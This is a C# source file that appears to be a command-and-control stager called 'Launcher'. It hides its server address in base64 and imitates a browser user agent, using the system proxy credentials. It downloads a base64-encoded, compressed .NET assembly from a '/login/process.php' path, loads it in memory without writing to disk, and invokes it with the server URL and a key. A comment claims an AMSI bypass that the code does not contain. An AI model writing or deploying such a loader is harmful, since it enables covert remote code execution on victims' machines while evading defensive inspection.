using System;
using System.Text;
using System.Net;
using System.Linq;
using System.Reflection;
using System.IO;
using System.IO.Compression;

namespace Launcher
{
    class Launcher
    {
        public static void Main() {
            //bypass amsi
            string u = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
            WebClient wc = new WebClient();
            wc.Headers.Add("User-Agent", u);
            wc.Proxy = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultCredentials;
            string k = "2939FAF7A1846F5C1E88CD1BD19C0CAF";
            string ser = Encoding.Unicode.GetString(Convert.FromBase64String("aAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADEAMAAwADgAMAA="));
            string t = "/login/process.php";
            wc.Headers.Add("Cookie", "oqszJYnU=zb/6Z3ZfMfBOsZnb6SS8FQj23X0=");
            byte[] data = wc.DownloadData(ser+t);
            string decryptedAssembly = Encoding.ASCII.GetString(data);
            Assembly agentAssembly = Assembly.Load(Decompress(Convert.FromBase64String(decryptedAssembly)));
            agentAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { ser,k });

        }
        private static byte[] Decompress(byte[] compressed)
        {
            using (MemoryStream inputStream = new MemoryStream(compressed.Length))
            {
                inputStream.Write(compressed, 0, compressed.Length);
                inputStream.Seek(0, SeekOrigin.Begin);
                using (MemoryStream outputStream = new MemoryStream())
                {
                    using (DeflateStream deflateStream = new DeflateStream(inputStream, CompressionMode.Decompress))
                    {
                        byte[] buffer = new byte[4096];
                        int bytesRead;
                        while ((bytesRead = deflateStream.Read(buffer, 0, buffer.Length)) != 0)
                        {
                            outputStream.Write(buffer, 0, bytesRead);
                        }
                    }
                    return outputStream.ToArray();
                }
            }
        }
    }
}
